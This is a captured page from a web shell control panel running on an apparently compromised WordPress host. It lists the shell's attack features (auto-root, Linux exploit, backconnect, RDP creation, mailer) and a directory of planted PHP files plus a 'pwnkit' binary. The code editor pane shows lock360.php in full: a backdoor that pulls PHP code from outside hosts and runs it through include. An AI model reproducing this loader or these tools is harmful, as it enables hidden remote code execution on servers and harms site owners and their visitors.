Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-includes /
sodium_compat /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
63
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
DRUPAL-HACKED.txt
0
B
-rw-r--r--
cglngoqp.php
18.54
KB
-rw-r--r--
fmzkdbvc.php
14.76
KB
-rw-r--r--
fthdhf.php
143.87
KB
-rw-r--r--
gnejitvq.php
14.76
KB
-rw-r--r--
inwldprc.php
18.54
KB
-rw-r--r--
lcstsklt.php
18.54
KB
-rw-r--r--
lock360.php
1.4
KB
-rw-r--r--
namespaced.php
1.31
KB
-rw-r--r--
nlpokecd.php
14.76
KB
-rw-r--r--
php.ini
147
B
-rw-r--r--
php72compat_const.php
4.49
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
ristretto255.php
7.04
KB
-rw-r--r--
sodium_compat.php
24.1
KB
-rw-r--r--
txets.php
5.89
KB
-rw-r--r--
wlqfzzjl.php
14.76
KB
-rw-r--r--
wp-login.php
5.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lock360.php
<?php function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.zvo1.xyz/'); if (!$code) { $code = GC('https://c2.icw7.com/'); } $need = '<' . '?' . 'php'; if (strpos($code, $need) === false) { die('get failed'); } if(function_exists('tmpfile')){ $file_name = tmpfile(); } if($file_name) { fwrite($file_name, $code); $a = stream_get_meta_data($file_name); $file_path = $a['uri']; @include($file_path); fclose($file_name); }else { $file_path = '.c'; file_put_contents($file_path, $code); @include($file_path); } @unlink($file_path); die(); }
Close